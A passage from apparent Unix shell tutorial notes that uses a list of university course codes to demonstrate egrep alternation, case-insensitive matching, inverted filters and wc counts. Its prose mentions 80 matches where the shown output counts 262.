    ANCE8002 Supercomputing Techniques
    ANCE9105 Comp Techniques Fluid Dynamics
    APHY3028 Computational Physics
    ARCH1391 Digital Computation Studio
    ARCH5202 Computer Applications 2
    ARCH5203 Computer Applications 3
    ARCH5205 Theory of Architectural Computin
    ARCH5220 Computer Graphics Programming 1
    ARCH5221 Computer Graphics Programming 2
    ARCH5223 Computer Applications 2
    ARCH5940 Theory of Architectural Computin
    ARCH5942 Arctitectural Computing Seminar
    ARCH5943 Theory of Architectural Computin
    ARCH6201 Architectural Computing 1
    ARCH6205 Architectural Computing 2
    ARCH6214 Architectural Computing 2
    ARCH7204 Design Computing Theory
    ARCH7205 Computer Graphics Programming
    ARTS2301 Computers, Brains & Minds
    ATAX0002 Computer Information Systems
    ATAX0053 Acct for Complex Struct & Inst
    ATAX0324 GST: Complex Issues & Planning
    ATAX0341 Comparative Tax Systems
    ATAX0424 GST: Complex Issues & Planning
    ATAX0441 Comparative Tax Systems
    ATAX0524 GST: Complex Issues & Planning
    ATAX0641 Comparative Tax Systems
    AUST2003 Aborig. Studies: a Global Compar
    AVEN1500 Computing for Aviation
    BEIL0003 BE Annual Design Competition
    BEIL0004 Design Competitions and Bids
    BENV1141 Computers and Information Tech
    BENV1242 Computer-Aided Design
    BENV2405 Computer Graphics Programming
    BINF3020 Computational Bioinformatics
    BINF9020 Computational Bioinformatics
    BIOM5912 Comp Thesis B&C
    BIOM5920 Thesis Part A (Comp)
    BIOM5921 Thesis Part B (Comp)
    BIOM9332 Biocompatibility
    BIOM9501 Computing for Biomedical Eng
    BIOM9601 Biomed Applic.of Microcomp 1
    BIOM9602 Biomed Applic.of Microcomp 2
    BIOS3021 Comparative Animal Physiology
    BLDG2281 Introduction To Computing
    BLDG3282 Computer Apps in Building
    BLDG3482 Computer Aplications in Constr
    CEIC5310 Computing Studies in The Process
    CEIC8310 Computing Studies Proc Ind
    CEIC8335 Adv Computer Methods
    CHEM3031 Inorg Chem:Trans Metals & Comp
    CHEM3640 Computers in Chemistry
    CIVL1015 Computing
    CIVL1106 Computing & Graphics
    CIVL3015 Engineering Computations
    CIVL3106 Engineering Computations
    CMED9517 Adv Biostatistic & Stat Comp
    CODE1110 Computational Design Theory 1
    CODE1210 Computational Design Theory 2
    CODE2110 Computational Design Theory 3
    CODE2120 Computational Sustainability
    CODE2121 Advanced Computational Design
    COFA2682 Multi-media Computing Unit 3
    COFA3681 Multi-media Computing Elective 1
    COFA5116 Design & Computers
    COFA5130 Typography & Composition
    COFA5216 Design & Computers 1
    COFA5240 Design & Computers 2 Cad
    COFA5241 Design & Computers 2 Graphics
    COFA5338 Design & Computers 3 - Cad
    COFA5339 Design & Computers 3 - Graphic
    COFA8670 Intro To Multi-media Computing
    COMD2040 Of Tigers & Pussycats: a Compa
    COMP0011 Fundamentals of Computing
    COMP1000 Web, Spreadsheets & Databases
    COMP1001 Introduction to Computing
    COMP1011 Computing 1A
    COMP1021 Computing 1B
    COMP1081 Harnessing the Power of IT
    COMP1091 Solving Problems with Software
    COMP1400 Programming for Designers
    COMP1711 Higher Computing 1A
    COMP1721 Higher Computing 1B
    COMP1911 Computing 1A
    COMP1917 Computing 1
    COMP1921 Computing 1B
    COMP1927 Computing 2
    COMP2011 Data Organisation
    COMP2021 Digital System Structures
    COMP2041 Software Construction
    COMP2091 Computing 2
    COMP2110 Software System Specification
    COMP2111 System Modelling and Design
    COMP2121 Microprocessors & Interfacing
    COMP2411 Logic and Logic Programming
    COMP2711 Higher Data Organisation
    COMP2811 Computing B
    COMP2911 Eng. Design in Computing
    COMP2920 Professional Issues and Ethics
    COMP3111 Software Engineering
    COMP3120 Introduction to Algorithms
    COMP3121 Algorithms & Programming Tech
    COMP3131 Programming Languages & Compil
    COMP3141 Software Sys Des&Implementat'n
    COMP3151 Foundations of Concurrency
    COMP3152 Comparative Concurrency Semant
    COMP3153 Algorithmic Verification
    COMP3161 Concepts of Programming Lang.
    COMP3171 Object-Oriented Programming
    COMP3211 Computer Architecture
    COMP3221 Microprocessors & Embedded Sys
    COMP3222 Digital Circuits and Systems
    COMP3231 Operating Systems
    COMP3241 Real Time Systems
    COMP3311 Database Systems
    COMP3331 Computer Networks&Applications
    COMP3411 Artificial Intelligence
    COMP3421 Computer Graphics
    COMP3431 Robotic Software Architecture
    COMP3441 Security Engineering
    COMP3511 Human Computer Interaction
    COMP3601 Design Project A
    COMP3710 Software Project Management
    COMP3711 Software Project Management
    COMP3720 Total Quality Management
    COMP3821 Ext Algorithms&Prog Techniques
    COMP3881 Ext Digital Circuits & Systems
    COMP3891 Ext Operating Systems
    COMP3901 Special Project A
    COMP3902 Special Project B
    COMP3931 Ext Computer Networks & App
    COMP4001 Object-Oriented Software Dev
    COMP4002 Logic Synthesis & Verification
    COMP4003 Industrial Software Developmen
    COMP4011 Web Applications Engineering
    COMP4012 Occasional Elec S2 - Comp.Eng.
    COMP4121 Advanced & Parallel Algorithms
    COMP4128 Programming Challenges
    COMP4131 Programming Language Semantics
    COMP4132 Adv. Functional Programming
    COMP4133 Advanced Compiler Construction
    COMP4141 Theory of Computation
    COMP4151 Algorithmic Verification
    COMP4161 Advanced Verification
    COMP4181 Language-based Software Safety
    COMP4211 Adv Architectures & Algorithms
    COMP4314 Next Generation Database Systs
    COMP4317 XML and Databases
    COMP4335 Wireless Mesh&Sensor Networks
    COMP4336 Mobile Data Networking
    COMP4337 Securing Wireless Networks
    COMP4411 Experimental Robotics
    COMP4412 Introduction to Modal Logic
    COMP4415 First-order Logic
    COMP4416 Intelligent Agents
    COMP4418 Knowledge Representation
    COMP4431 Game Design Workshop
    COMP4432 Game Design Studio
    COMP4442 Advanced Computer Security
    COMP4511 User Interface Design & Constr
    COMP4601 Design Project B
    COMP4903 Industrial Training
    COMP4904 Industrial Training 1
    COMP4905 Industrial Training 2
    COMP4906 Industrial Training 3
    COMP4910 Thesis Part A
    COMP4911 Thesis Part B
    COMP4913 Computer Science 4 Honours P/T
    COMP4914 Computer Science 4 Honours F/T
    COMP4920 Management and Ethics
    COMP4930 Thesis Part A
    COMP4931 Thesis Part B
    COMP4941 Thesis Part B
    COMP6714 Info Retrieval and Web Search
    COMP6721 (In-)Formal Methods
    COMP6731 Combinatorial Data Processing
    COMP6733 Internet of Things
    COMP6741 Parameterized & Exact Comp.
    COMP6752 Modelling Concurrent Systems
    COMP6771 Advanced C++ Programming
    COMP9000 Special Program
    COMP9001 E-Commerce Technologies
    COMP9008 Software Engineering
    COMP9009 Adv Topics in Software Eng
    COMP9015 Issues in Computing
    COMP9018 Advanced Graphics
    COMP9020 Foundations of Comp. Science
    COMP9021 Principles of Programming
    COMP9022 Digital Systems Structures
    COMP9024 Data Structures & Algorithms
    COMP9031 Internet Programming
    COMP9032 Microprocessors & Interfacing
    COMP9041 Software Construction
    COMP9081 Harnessing the Power of IT
    COMP9101 Design &Analysis of Algorithms
    COMP9102 Programming Lang & Compilers
    COMP9103 Algorithms & Comp. Complexity
    COMP9104 Quantum ICT
    COMP9116 S'ware Dev: B-Meth & B-Toolkit
    COMP9117 Software Architecture
    COMP9151 Foundations of Concurrency
    COMP9152 Comparative Concurrency Semant
    COMP9153 Algorithmic Verification
    COMP9161 Concepts of Programming Lang.
    COMP9171 Object-Oriented Programming
    COMP9181 Language-based Software Safety
    COMP9201 Operating Systems
    COMP9211 Computer Architecture
    COMP9221 Microprocessors & Embedded Sys
    COMP9222 Digital Circuits and Systems
    COMP9231 Integrated Digital Systems
    COMP9242 Advanced Operating Systems
    COMP9243 Distributed Systems
    COMP9244 Software View of Proc Architec
    COMP9245 Real-Time Systems
    COMP9282 Ext Micros & Interfacing
    COMP9283 Ext Operating Systems
    COMP9311 Database Systems
    COMP9313 Big Data Management
    COMP9314 Next Generation Database Systs
    COMP9315 Database Systems Implementat'n
    COMP9316 eCommerce Implementation
    COMP9317 XML and Databases
    COMP9318 Data Warehousing & Data Mining
    COMP9319 Web Data Compression & Search
    COMP9321 Web Applications Engineering
    COMP9322 Service-Oriented Architectures
    COMP9323 e-Enterprise Project
    COMP9331 Computer Networks&Applications
    COMP9332 Network Routing and Switching
    COMP9333 Advanced Computer Networks
    COMP9334 Systems Capacity Planning
    COMP9335 Wireless Mesh&Sensor Networks
    COMP9336 Mobile Data Networking
    COMP9337 Securing Wireless Networks
    COMP9414 Artificial Intelligence
    COMP9415 Computer Graphics
    COMP9416 Knowledge Based Systems
    COMP9417 Machine Learning & Data Mining
    COMP9418 Advanced Machine Learning
    COMP9431 Robotic Software Architecture
    COMP9441 Security Engineering
    COMP9444 Neural Networks
    COMP9447 Security Engineering Workshop
    COMP9511 Human Computer Interaction
    COMP9514 Advanced Decision Theory
    COMP9515 Pattern Classification
    COMP9517 Computer Vision
    COMP9518 Pattern Recognition
    COMP9519 Multimedia Systems
    COMP9520 Ext Foundations of Computer Sc
    COMP9596 Research Project
    COMP9790 Principles of GNSS Positioning
    COMP9791 Modern Navigation &Positioning
    COMP9801 Ext Design&Analysis of Algo
    COMP9814 Ext Artificial Intelligence
    COMP9833 Ext Computer Networks & Appl
    COMP9844 Ext Neural Networks
    COMP9901 P/T Res. Thesis Comp Sci & Eng
    COMP9902 Res. Thesis Comp Sci & Eng F/T
    COMP9910 Mgt&Com Skills-CompSci&Eng Res
    COMP9912 Project (24 UOC)
    COMP9930 Readings in Comp Sci and Eng
    COMP9945 Research Project
    CRIM3010 Comparative Criminal Justice
    CVEN1015 Computing
    CVEN1025 Computing
    CVEN2002 Engineering Computations
    CVEN2025 Engineering Computations 1
    CVEN2702 Engineering Computations
    CVEN3025 Engineering Computations 2
    CVEN4307 Steel & Composite Structures
    CVEN8827 Composite Steel-Concrete Struc
    CVEN9820 Computational Struct Mechanics
    CVEN9822 Steel & Composite Structures
    CVEN9827 Composite Steel-Concrete Struc
    DANC2000 Dance Analysis & Composition 1
    DANC2005 Dance Analysis & Composition 2
    DANC2015 Dance Analysis & Composition 3
    ECON3213 Comparative Forecasting Techs
    ECON5122 Compet. in the Know. Econ.
    ECON5255 Computational Stats & Econ Mod
    EDST1492 Computer Skills for Teachers
    EDST4092 Computer Skills for Teachers
    EDST4157 Computing Studies Method 1
    EDST4158 Computing Studies Method 2
    ELEC4343 Source Coding & Compression
    ELEC4432 Computer Control & Instrumenta
    ELEC4632 Computer Control Systems
    ELEC9401 Computer Control Systems 1
    ELEC9402 Computer Control Systems 2
    ELEC9403 Real Time Computing & Control
    ELEC9733 Real Computing and Control
    ENGG1811 Computing for Engineers
    EURO2302 The Messiah Complex
    FINS5553 Insur. Comp. Oper. & Manage.
    FNDN0301 Computing Studies
    FNDN0302 Computing Studies and Research
    FNDN0311 Computing Studies - T
    FOOD4220 Computer Applications
    FOOD4320 Computer Applications
    FOOD4537 Computing in Food Science
    FOOD9101 Complex Fluid Micro & Rheology
    GBAT9131 Leadership in a Complex Enviro
    GEND1212 Analysing a Picture:Comp.&Des.
    GEND4201 Design and Computing
    GENE8001 Computer Game Design
    GENM0515 Computers for Professionals
    GENP0515 Computers for Professionals
    GENS2001 The Computer
    GENS5525 The Comp: Its Impact, Sign'fcnce
    GENT0407 Tv Soaps: a Comparative Study
    GENT0603 The Computer: Impact, Significan
    GENT0802 The Complexity of Everyday Life
    GENT1003 Computers into the 21st C
    GEOG3161 Computer Mapping & Data Displa
    GEOG3861 Computer Mapping
    GEOG9014 Computer Mapping &Data Display
    GEOG9210 Computer Mapping & Data Displa
    GEOL0300 Computing & Stats for Geol
    GEOL2041 Geological Computing
    GMAT1111 Introduction To Computing
    GMAT1150 Survey Methods& Computations
    GMAT1300 Comp Appl in Geomatics
    GMAT2111 Principles of Computer Processin
    GMAT2112 Principles of Computer Processin
    GMAT2122 Computer Graphics 1
    GMAT2131 Survey Computations
    GMAT2350 Comp for Spatial Info Sciences
    GMAT2500 Surveying Computations A
    GMAT2550 Surveying Computations B
    GMAT3111 Survey Computations
    GMAT3122 Computer Graphics 1
    GMAT3231 Geodetic Computations
    GMAT4111 Data Analysis & Computing 1
    GMAT4112 Data Analysis & Computing 1
    GMAT5111 Data Analysis & Computing 2
    GMAT5112 Data Analysis & Computing 2
    GMAT5122 Computer Graphics 2
    HEAL9471 Comparative H'lth Care Systems
    HEAL9501 Comp Tech for Health Serv Mngt
    HIST2487 The Messiah Complex
    HPSC2610 Computers, Brains & Minds
    HPST2004 Computers, Brains & Minds
    HPST2109 Computers, Brains & Minds
    IDES2121 Introduction To Computing
    IDES3101 Design Studio 5: Complexity
    IDES3231 Adv Computer Aided Product Des
    IDES5153 Computer Graphic Applications
    IDES5154 Computer Aided Design
    IEST5009 Competencies in Sustainability
    IEST5010 Competencies in Sustainability
    ILAS0232 Computer Prog'mng for Info. Appl
    ILAS0233 Computing Applications in The in
    INFS3607 Distributed Computer Systems
    IROB5732 Spec Topic- Internat & Comp IR
    IROB5734 Adv Seminar-Internat & Comp IR
    JURD7348 Harry Gibbs Moot Comp 6uoc
    JURD7419 Competition Law and Policy
    JURD7473 Asian Competition Law
    JURD7474 Competition Law and IP
    JURD7489 Complex Civil Litigation
    JURD7522 Competition Law
    JURD7559 Int'l&Comparative Law W'shop
    JURD7610 Mediation Competition
    JURD7616 International & Comparative IP
    JURD7648 Transitional Justice Intl Comp
    JURD7989 Comparative Anti-Terrorism Law
    JWST2104 The Messiah Complex
    LAND1131 Introduction To Computer Applica
    LAWS1032 Computer Applications to Law
    LAWS2065 Comparative Law
    LAWS2085 Comparative Law
    LAWS2110 Comparative Constitutional Law
    LAWS2148 Harry Gibbs Moot Comp 8uoc
    LAWS2410 Mediation Competition
    LAWS2589 Complex Civil Litigation
    LAWS3009 Comparative Criminal Justice:
    LAWS3022 Competition Law
    LAWS3035 Developing Comp Apps to Law
    LAWS3051 Telecomm. Competition & Cons.
    LAWS3148 Harry Gibbs Moot Comp
    LAWS3159 Int'l&Comparative Law W'shop
    LAWS3348 Transitional Justice Intl Comp
    LAWS3510 Mediation Competition
    LAWS3589 Complex Civil Litigation
    LAWS4016 International & Comparative IP
    LAWS4019 Competition Law
    LAWS4089 Comparative Anti-Terrorism Law
    LAWS4120 Themes in Asian & Compar. Law
    LAWS4133 Issues in Asian & Comp Law
    LAWS4291 Comparative Constitutional Law
    LAWS4620 Computer Applications To Law
    LAWS4765 Complex Commercial Litigation
    LAWS5234 Competition Law and Regulation
    LAWS7003 Global Issues in Comp Policy
    LAWS8016 International & Comparative IP
    LAWS8073 Asian Competition Law
    LAWS8074 Competition Law and IP
    LAWS8118 Legal Systems in Comp Persp
    LAWS8143 Comparative Patent Law
    LAWS8144 Comparative Trade Mark Law
    LAWS8219 Competition Law and Policy
    LAWS8289 Comparative Anti-Terrorism Law
    LAWS8348 Transitional Justice Intl Comp
    LAWS8765 Complex Commercial Litigation
    LAWS9973 Comparative Law
    LAWS9984 Int. & Comp. Indigenous Law
    LEGT5531 Comp. Bus. & Legal Strategies
    LEGT5602 Tax Admin. & Compliance
    LIBS0233 Computer Applications in The Inf
    MANF3500 Computers in Manufacturing 1
    MANF4500 Computers in Manufacturing 2
    MANF4601 Comp Aided Production Mgmt A
    MANF4602 Comp Aided Production Mgmt B
    MANF8560 Computer Integrated Manufact.
    MANF9500 Computer-aided Progrmg for Numcl
    MANF9543 Comp Aided Design/Manufacture
    MANF9560 Computer Integrated Manufact.
    MARK3022 Computer Applications in Marketi
    MATH1061 Introductory Applied Computing
    MATH2301 Mathematical Computing
    MATH2430 Symbolic Computing
    MATH2520 Complex Analysis
    MATH2521 Complex Analysis
    MATH2620 Higher Complex Analysis
    MATH2621 Higher Complex Analysis
    MATH2810 Statistical Computing
    MATH2910 Higher Statistical Computing
    MATH3101 Computational Mathematics
    MATH3301 Advanced Math Computing
    MATH3311 Math Computing for Finance
    MATH3400 Logic & Computability
    MATH3421 Logic and Computability
    MATH3430 Symbolic Computing
    MATH3680 Higher Complex Analysis
    MATH3790 Higher Computat. Combinatorics
    MATH3800 Statistical Computation 1
    MATH3810 Statistical Computation 2
    MATH3821 Stat Modelling & Computing
    MATH3871 Bayesian Inference and Comp
    MATH4003 Maths and Comp Sci Honours F/T
    MATH4004 Maths and Comp Sci Honours P/T
    MATH5009 Comp'l Coursework Thesis FT
    MATH5010 Comp'l Coursework Thesis PT
    MATH5305 Computational Mathematics
    MATH5315 High Perf Numerical Computing
    MATH5335 Comput'l Methods for Finance
    MATH5400 Logic & Computability
    MATH5505 Computational Combinatorics
    MATH5685 Complex Analysis
    MATH5856 Intro to Stats and Stat Comput
    MATH5960 Bayesian Inference & Comput'n
    MATH9315 Topics in Mathematical Computing
    MATS1021 Computing in Materials Science
    MATS1264 Fibre Reinforced Plastic Composi
    MATS3064 Composite Materials
    MATS4005 Composites and Functional Mats
    MATS5342 Comp Modelling & Design
    MATS6110 Computational Materials
    MBAX9131 Leadership in a Complex Enviro
    MECH1500 Computing 1M
    MECH3500 Computing 2M
    MECH3510 Computing Applications in Mech.
    MECH3530 Computing Applcts in Mechanical
    MECH3540 Computational Engineering
    MECH4130 Computer-aided Engineering Desig
    MECH4150 Design & Maintenance of Componen
    MECH4500 Computing 3M
    MECH4620 Computational Fluid Dynamics
    MECH8620 Computational Fluid Dynamics
    MECH9150 Design & Maintenance of Componen
    MECH9420 Composite Materials and Mechan
    MECH9620 Computational Fluid Dynamics
    MEFT5103 Computer Media
    MGMT2106 Comparative Management Systems
    MGMT5050 Teams, Ethics & Comp Adv
    MGMT5802 Comp. Adv. Through People
    MINE0710 Computing 1
    MINE1720 Microcomputers (mining)
    MINE1730 Computer Applications in Mining
    MINE4082 Computational Methods
    MINE4810 Comp Methods in Geomechanics
    MTRN2500 Comp for MTRN
    MTRN3500 Comp Appl in Mechatonic Sys
    MTRN3530 Computing Applcts in Mech.Sys.
    PFST2000 Dance Analysis & Composition 1
    PFST2005 Dance Analysis & Composition 2
    PFST2011 Performance Composition
    PHAR9121 Postmarketing Compliance Meds
    PHCM9471 Comparative H'lth Care Systems
    PHIL5206 AI & Computer Science
    PHIL5207 Ai & Computer Science 2A
    PHYS1601 Comp. Applic'ns in Exp. Sci. 1
    PHYS2001 Mechanics & Computational Phys
    PHYS2020 Computational Physics
    PHYS2120 Mechanics and Computational
    PHYS2601 Computer Applications 2
    PHYS3601 Computer Applications in Instrum
    PHYS3610 Computational Physics
    PHYS3620 Computer Based Signal Processing
    PLAN1061 Computer Literacy
    POLS2016 Concepts in Comparative Pol Cult
    POLS3953 Comparative Politics: Russia
    PSYC3191 Computer Science & Psychology
    PTRL1013 Computing-Petroleum Engineers
    PTRL4013 Well Completion & Stimulation
    PTRL5016 Well Completions & Stimulation
    PTRL6016 Well Completions & Stimulation
    REGS0044 Comp Law in Global Context
    REGS0115 Compliance: Financial Service
    REGS0218 Compliance: Financial Services
    REGS0428 Computer Applications in Linguis
    REGS0453 Multiple Regress. & Stat Comp
    REGS0474 Comparative International Tax
    REGS0633 Comparative Corp & Comm Law
    REGS0638 International Comparative Corp
    REGS0718 Energy Co-Compliance in Bldgs
    REGS3092 Comp Cntrl of Machines & Proc
    REGS3265 Intl and Comparative Ind. Rel.
    REGS3410 Computer Networks
    REGS3873 Introduction To Computer Graphic
    REGS3909 Trade Marks & Unfair Comp
    REGS3948 Competition Law
    REGS4045 Competition Reg. of Mergers
    REGS5618 Comp Integrated Manufacturing
    REGS7726 Composites & Multiphase Polyme
    REGS7908 Service Managing for Comp.Adv.
    SART1608 Digital Composite 1
    SART1681 Multimedia Computing Elective1
    SART1810 Introduction to Computing
    SART2608 Digital Composite 2
    SART2681 Multimedia Computing Elective2
    SART2811 Multimedia Computing Workshop
    SART2835 Composition and Design
    SART3608 Digital Composite 3
    SART3681 Multimedia Computing Elective3
    SART3840 Advanced Multimedia Computing
    SART9725 Intro to Multimedia Computing
    SART9739 Multimedia Computing Elective
    SART9741 Composition and Design
    SDES1106 Design and Computers 1
    SDES1110 Design and Computers 2
    SDES1111 Integrated Design Computing 1
    SDES1211 Integrated Design Computing 2
    SDES1601 Colour,Composition &Typography
    SDES2107 Design and Computers 3
    SDES2115 Design and Computers 2B
    SDES3107 Design and Computers 4
    SDES3173 Advanced Computer Graphics
    SDES4103 Design and Computers 4
    SDES6714 Intro 3D Computer Aided Design
    SLSP2902 Computers and Comm.
    SOCA3314 The Messiah Complex
    SOCI3401 Computer Analysis of Social Data
    SOCI3408 Computer Analysis of Social Data
    SOMA1608 Digital Composite
    SOMA1681 Intro Multimedia Computing
    SOMA1810 Introduction to Computing
    SOMA2402 Tangible Computing
    SOMA2608 Digital Composite 2
    SOMA2681 Advanced Multimedia Computing
    SOMA2811 Multimedia Computing Workshop
    SOMA3415 Compositional Project
    SOMA3608 Digital Composite 3
    SURV1111 Introduction To Computing
    SURV2111 Principles of Computer Processin
    SURV2122 Computer Graphics 1
    SURV3111 Survey Computations
    SURV3231 Geodetic Computations
    SURV4111 Data Analysis & Computing 1
    SURV5111 Data Analysis & Computing 2
    SURV5122 Computer Graphics 2
    SURV6121 Computer Graphics
    TABL1002 Computer Information Systems
    TABL2053 Acct for Complex Struct & Inst
    TABL3044 Comparative Tax Systems
    TABL5544 Comparative Tax Systems
    TEDG1101 Computers in Education
    TEDG1106 Computer-based Resources: Design
    TEDG1107 Managing With Computers in Schoo
    TEDG1112 Computers - Gifted & Talented St
    TEDG1113 Computer Control Technology in E
    TEED1134 Fundamentals of Computing
    TEED2119 Computers & People
    TELE4343 Source Coding and Compression
    TELE9302 Computer Networks
    TEXT2501 Computing Applications
    ZACM3011 Component Design
    ZACM3433 Compressible Flow
    ZACM4020 Computational Structures
    ZACM4031 Compressible Flow
    ZACM4913 Eng App of Comp Fluid Dynamics
    ZBUS2200 Markets and Competition
    ZEIT1101 Computational Problem Solving
    ZEIT1110 Computer Games
    ZEIT2102 Computer Technology
    ZEIT2305 Computer Games
    ZEIT3113 Computer Languages & Algorithm
    ZEIT3304 Computing Proj - Info Sys
    ZEIT3307 Computer Games
    ZEIT4003 Computational Fluid Dynamics
    ZEIT7101 Computational Problem Solving
    ZEIT8020 Computer Network Operations
    ZEIT8028 Computer Forensics
    ZEIT9100 Computer Science Research F/T
    ZEIT9101 Computer Science Research P/T
    ZGEN2300 Computers in Society
    ZGEN2301 Computer Games
    ZHSS8431 Comparative Defence Planning
    ZINT1001 Eng Comp Methods 1
    ZITE1001 Computer Tools for Engineers
    ZITE1101 Intro to Computer Science
    ZITE2101 Computer Languages & Algorithm
    ZITE2102 Computer Technology
    ZITE3101 Computing Proj - Comp Sci
    ZITE3105 Human Computer Interaction
    ZITE3106 Interactive Computer Graphics
    ZITE3113 Computer Languages & Algorithm
    ZITE3211 Microcomputer Interfacing
    ZITE3304 Computing Proj - Info Sys
    ZITE4101 Computer Sci 4 (Comb Hons) F/T
    ZITE4102 Computer Sci 4 (Comb Hon) P/T
    ZITE4103 Computer Science 4 (Hons) F/T
    ZITE4104 Computer Science 4 (Hons) P/T
    ZITE8103 Computer Graphics
    ZITE8104 Computer Security
    ZITE8105 Computer Speech Processing
    ZITE8145 SoftComp
    ZITE9100 Computer Science Research F/T
    ZITE9101 Computer Science Research P/T
    ZPEM3302 Complex Variables
    
    The second one looks better because the data itself isn't transformed, only the internal comparisons.

    If we want to know how many courses have "computing" or "computer" in their title, we have to use egrep, which recognises the alternative operator "|", and wc to count the number of matches. There are a couple of ways to construct the regexp:

    egrep -i 'computer|computing' course_codes | wc
        262    1149    9027
    
    egrep -i 'comput(er|ing)' course_codes | wc
        262    1149    9027
    
    If you don't like the irrelevant word and character counts, use wc -l.

    Most of these 80 matches were CSE offerings, whose course codes begin with COMP, SENG or BINF. Which of the matches were courses offered by other schools?

    Think about it for a moment.... There's no "but not" regexp operator, so instead we construct a composite filter with an extra step to deal with eliminating the CSE courses:

    egrep -i 'computer|computing' course_codes | egrep -v '^(COMP|SENG|BINF)'
    ACSC1600 Computer Science 1
    ACSC1800 Computer Science 1E
    ACSC2015 Interactive Computer Graphics
    ACSC2020 Computer Science Core B2
    ACSC2021 Computer Systems Architectrue 2
    ACSC2107 Computer Languages B
    ACSC2601 Computer Science 2A
    ACSC2602 Computer Science 2B
    ACSC2802 Computer Science 2EE
    ACSC3003 Computer Project
    ACSC3029 Computing Project 3
    ACSC3030 Cryptography & Computer Securi
    ACSC3601 Computer Science 3A
    ACSC3603 Computer Science 3C
    ACSC4191 Computer Science 4 (Hons) F/T
    ACSC7304 Computer Graphics
    ACSC7306 Computer Speech Processing
    ACSC7336 Computer Security
    ACSC8248 Computer Graphics (12 Cpt)
    ACSC9000 Computer Science Research F/T
    ACSC9001 Computer Science Research P/T
    AELE2007 Computer Design
    AELE2508 Microcomputer Interfacing
    AELE3031 Microcomputer Interfacing
    AELE4511 Computer Control Theory
    ANCE8002 Supercomputing Techniques
    ARCH5202 Computer Applications 2
    ARCH5203 Computer Applications 3
    ARCH5220 Computer Graphics Programming 1
    ARCH5221 Computer Graphics Programming 2
    ARCH5223 Computer Applications 2
    ARCH5942 Arctitectural Computing Seminar
    ARCH6201 Architectural Computing 1
    ARCH6205 Architectural Computing 2
    ARCH6214 Architectural Computing 2
    ARCH7204 Design Computing Theory
    ARCH7205 Computer Graphics Programming
    ARTS2301 Computers, Brains & Minds
    ATAX0002 Computer Information Systems
    AVEN1500 Computing for Aviation
    BENV1141 Computers and Information Tech
    BENV1242 Computer-Aided Design
    BENV2405 Computer Graphics Programming
    BIOM9501 Computing for Biomedical Eng
    BLDG2281 Introduction To Computing
    BLDG3282 Computer Apps in Building
    BLDG3482 Computer Aplications in Constr
    CEIC5310 Computing Studies in The Process
    CEIC8310 Computing Studies Proc Ind
    CEIC8335 Adv Computer Methods
    CHEM3640 Computers in Chemistry
    CIVL1015 Computing
    CIVL1106 Computing & Graphics
    COFA2682 Multi-media Computing Unit 3
    COFA3681 Multi-media Computing Elective 1
    COFA5116 Design & Computers
    COFA5216 Design & Computers 1
    COFA5240 Design & Computers 2 Cad
    COFA5241 Design & Computers 2 Graphics
    COFA5338 Design & Computers 3 - Cad
    COFA5339 Design & Computers 3 - Graphic
    COFA8670 Intro To Multi-media Computing
    CVEN1015 Computing
    CVEN1025 Computing
    EDST1492 Computer Skills for Teachers
    EDST4092 Computer Skills for Teachers
    EDST4157 Computing Studies Method 1
    EDST4158 Computing Studies Method 2
    ELEC4432 Computer Control & Instrumenta
    ELEC4632 Computer Control Systems
    ELEC9401 Computer Control Systems 1
    ELEC9402 Computer Control Systems 2
    ELEC9403 Real Time Computing & Control
    ELEC9733 Real Computing and Control
    ENGG1811 Computing for Engineers
    FNDN0301 Computing Studies
    FNDN0302 Computing Studies and Research
    FNDN0311 Computing Studies - T
    FOOD4220 Computer Applications
    FOOD4320 Computer Applications
    FOOD4537 Computing in Food Science
    GEND4201 Design and Computing
    GENE8001 Computer Game Design
    GENM0515 Computers for Professionals
    GENP0515 Computers for Professionals
    GENS2001 The Computer
    GENT0603 The Computer: Impact, Significan
    GENT1003 Computers into the 21st C
    GEOG3161 Computer Mapping & Data Displa
    GEOG3861 Computer Mapping
    GEOG9014 Computer Mapping &Data Display
    GEOG9210 Computer Mapping & Data Displa
    GEOL0300 Computing & Stats for Geol
    GEOL2041 Geological Computing
    GMAT1111 Introduction To Computing
    GMAT2111 Principles of Computer Processin
    GMAT2112 Principles of Computer Processin
    GMAT2122 Computer Graphics 1
    GMAT3122 Computer Graphics 1
    GMAT4111 Data Analysis & Computing 1
    GMAT4112 Data Analysis & Computing 1
    GMAT5111 Data Analysis & Computing 2
    GMAT5112 Data Analysis & Computing 2
    GMAT5122 Computer Graphics 2
    HPSC2610 Computers, Brains & Minds
    HPST2004 Computers, Brains & Minds
    HPST2109 Computers, Brains & Minds
    IDES2121 Introduction To Computing
    IDES3231 Adv Computer Aided Product Des
    IDES5153 Computer Graphic Applications
    IDES5154 Computer Aided Design
    ILAS0232 Computer Prog'mng for Info. Appl
    ILAS0233 Computing Applications in The in
    INFS3607 Distributed Computer Systems
    LAND1131 Introduction To Computer Applica
    LAWS1032 Computer Applications to Law
    LAWS4620 Computer Applications To Law
    LIBS0233 Computer Applications in The Inf
    MANF3500 Computers in Manufacturing 1
    MANF4500 Computers in Manufacturing 2
    MANF8560 Computer Integrated Manufact.
    MANF9500 Computer-aided Progrmg for Numcl
    MANF9560 Computer Integrated Manufact.
    MARK3022 Computer Applications in Marketi
    MATH1061 Introductory Applied Computing
    MATH2301 Mathematical Computing
    MATH2430 Symbolic Computing
    MATH2810 Statistical Computing
    MATH2910 Higher Statistical Computing
    MATH3301 Advanced Math Computing
    MATH3311 Math Computing for Finance
    MATH3430 Symbolic Computing
    MATH3821 Stat Modelling & Computing
    MATH5315 High Perf Numerical Computing
    MATH9315 Topics in Mathematical Computing
    MATS1021 Computing in Materials Science
    MECH1500 Computing 1M
    MECH3500 Computing 2M
    MECH3510 Computing Applications in Mech.
    MECH3530 Computing Applcts in Mechanical
    MECH4130 Computer-aided Engineering Desig
    MECH4500 Computing 3M
    MEFT5103 Computer Media
    MINE0710 Computing 1
    MINE1720 Microcomputers (mining)
    MINE1730 Computer Applications in Mining
    MTRN3530 Computing Applcts in Mech.Sys.
    PHIL5206 AI & Computer Science
    PHIL5207 Ai & Computer Science 2A
    PHYS2601 Computer Applications 2
    PHYS3601 Computer Applications in Instrum
    PHYS3620 Computer Based Signal Processing
    PLAN1061 Computer Literacy
    PSYC3191 Computer Science & Psychology
    PTRL1013 Computing-Petroleum Engineers
    REGS0428 Computer Applications in Linguis
    REGS3410 Computer Networks
    REGS3873 Introduction To Computer Graphic
    SART1681 Multimedia Computing Elective1
    SART1810 Introduction to Computing
    SART2681 Multimedia Computing Elective2
    SART2811 Multimedia Computing Workshop
    SART3681 Multimedia Computing Elective3
    SART3840 Advanced Multimedia Computing
    SART9725 Intro to Multimedia Computing
